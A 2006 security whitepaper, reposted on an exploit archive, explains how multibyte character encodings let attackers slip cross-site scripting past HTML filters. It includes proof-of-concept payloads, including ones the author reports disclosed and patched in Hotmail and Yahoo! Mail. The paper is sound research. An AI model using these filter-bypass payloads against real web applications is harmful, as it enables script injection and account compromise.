exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Aug 18, 2006
Authored by Cheng Peng Su

Whitepaper discussing the bypassing of script filter with variable-width encodings.

tags | paper
SHA-256 | 3f758cdb2a9ed75213ae2fa409be10c8c8b216d0491636c6a61a4c332194a72f


Change Mirror Download
Bypassing script filters with variable-width encodings

Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006

We've all known that the main problem of constructing XSS attacks is
how to obfuscate malicious code. In the following paragraphs I will

attempt to explain the concept of bypassing script filters with
variable-width encodings, and disclose the applications of this
concept to

Hotmail and Yahoo! Mail web-based mail services.

Variable-width encoding Introduction

A variable-width encoding(a.k.a variable-length encoding) is a type of
character encoding scheme in which codes of differing lengths are

used to encode a character set. Most common variable-width encodings
are multibyte encodings, which use varying numbers of bytes to encode

different characters. The first use of multibyte encodings was for the
encoding of Chinese, Japanese and Korean, which have large character

sets well in excess of 256 characters. The Unicode standard has two
variable-width encodings: UTF-8 and UTF-16. The most commonly-used

codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
EUC-KR, are examples of such two-byte EUC codes. And there are also

some three-byte and four-byte codes.

Example and Discussion

The following is a php file from which I will start to introduce my idea.


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\" >"
// NOTE: 5 space characters following the last \"



For most values of $i, Internet Explorer 6.0(SP2) will display "Char
XXX is not available". When $i is between 192(0xC0) and 255(0xFF), you

can see "Char XXX is available". Let's take $i=0xC0 for example,
consider the following code:

Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]" >available</font>

0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it will consider 0xC0 and the

following quote as a sequence, and therefore these two pairs of FONT
elements will become one with "xyz[0xC0]">not </font><font face=" as

the value of FACE parameter. The second 0xC0 will start another 2-byte
sequence as a value of NOTEXIST parameter which is not quoted. Due

to a space character following by the quote, 0xE0-0xEF which are first
bytes of 3-byte sequences, together with the following quote and one

space character will be considered as the value of NOTEXIST parameter.
And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte

sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
following quote and space characters will be considered as one


Here are the results of the above code parsed by Internet Explorer
6.0(SP2), Firefox and Opera 9.0.1 in different variable-width

encodings respectively. Note that the numbers in the table are the
ranges of "available" characters.

| | IE | FF | OP |
| UTF-8 | 0xC0-0xFF | none | none |
| GB2312 | 0x81-0xFE | none | 0x81-0xFE |
| GB18030 | none | none | 0x81-0xFE |
| BIG5 | 0x81-0xFE | none | 0x81-0xFE |
| EUC-KR | 0x81-0xFE | none | 0x81-0xFE |
| EUC-JP | 0x81-0x8D | 0x8F | 0x8E |
| | 0x8F-0x9F | | 0x8F |
| | 0xA1-0xFE | | 0xA1-0xFE |
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
| | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |


I don't think there is a typical exploitation of bypassing script
filters with variable-width encodings, because the exploitation is

flexible. But you just need to remember that if the webapp use
variable-width encodings, you can bury some characters following by

entry, and the buried characters might be very crucial.

The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For

example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier

Supposing it use UTF-8, we can attack by sending

[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()

And it will be tranformed into

<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>

Again, the exploitation is very flexible, this FONT-FONT example is
just an enlightening one. The following exploitaion to Yahoo! Mail is

quite different from this one.


Using this method, I have found two XSS vulnerabilities in Hotmail and
Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft

on April 30 and May 12 respectively. And they have patched the vulnerabilities.

Yahoo! Mail XSS

Before I discovered this vulnerability, Yahoo! Mail filtering engine
could block "expression()" syntax in a CSS attribute using a comment

to break up expression( expr/* */ession() ). I used [0x81] with the
following asterisk to make a sequence, so that the second */ would

close the comment. But the filtering engine considered the first two
comment symbol as a pair.

MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>

Hotmail XSS

This exploitation is almost the same as the example.php.

MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example

<font face="[0x81]"></font><font face=" onmouseover=alert()


RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)

( Original text: http://applesoup.googlepages.com/bypass_filter.txt )
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By